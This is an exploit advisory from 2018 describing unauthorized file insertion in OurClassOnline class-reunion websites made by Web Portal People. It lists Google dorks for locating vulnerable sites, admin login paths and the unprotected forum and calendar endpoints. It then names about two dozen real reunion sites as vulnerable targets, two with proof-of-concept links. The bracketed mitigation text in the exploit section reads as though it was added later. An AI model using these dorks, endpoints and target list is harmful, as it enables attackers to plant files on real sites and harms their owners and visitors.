#################################################################################################
# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Admin and Moderator Panel Login Paths :
/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4
#################################################################################################
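# Exploit : [ Affected endpoints. Per the advisory title and CWE-264, the create/add forms below accept submissions without authorization, and forum attachments are stored under /files_forum/. Mitigation: require an authenticated, authorized session on forum_topic_create.php and calendar_add.php, and validate what may be stored in /files_forum/. ]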
/forum_topic_create.php?forumid=1
/files_forum/[RANDOM-NUMBER]_[YOUR-FILENAME-HERE].txt
/calendar_add.php
/calendar_event.php?eventid=[RANDOM-NUMBER]
#################################################################################################
# Example Vulnerable Sites =>
[+] mcclintockhighchargers1968.com/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/YZhat
[+] tech1958.net/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/euIxf
[+] tempehighbuffs68.com/forum_topic_create.php?forumid=1
[+] orhs66.com/forum_topic_create.php?forumid=1
[+] denfeld59.com/forum_topic_create.php?forumid=1
[+] edison68.com/forum_topic_create.php?forumid=1
[+] edison64.com/forum_topic_create.php?forumid=1
[+] edison65.com/forum_topic_create.php?forumid=1
[+] marshalltown68.com/forum_topic_create.php?forumid=1
[+] ths1958.com/forum_topic_create.php?forumid=1
[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1
[+] hths74.com/forum_topic_create.php?forumid=1
[+] salemhighschool1959.com/forum_topic_create.php?forumid=1
[+] lchs1966bulldogs.com/forum_topic_create.php?forumid=1
[+] hooverhighclassof63.com/forum_topic_create.php?forumid=1
[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1
[+] phs1957.com/forum_topic_create.php?forumid=1
[+] redlandshigh65.com/forum_topic_create.php?forumid=1
[+] warrenmott1983.com/forum_topic_create.php?forumid=1
[+] dulutheast1965.com/forum_topic_create.php?forumid=1
[+] axemen68.org/forum_topic_create.php?forumid=1
[+] olympushigh1967.com/forum_topic_create.php?forumid=1
[+] leuzingerhigh1981.com/forum_topic_create.php?forumid=1
[+] bozemanhawks88.com/forum_topic_create.php?forumid=1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################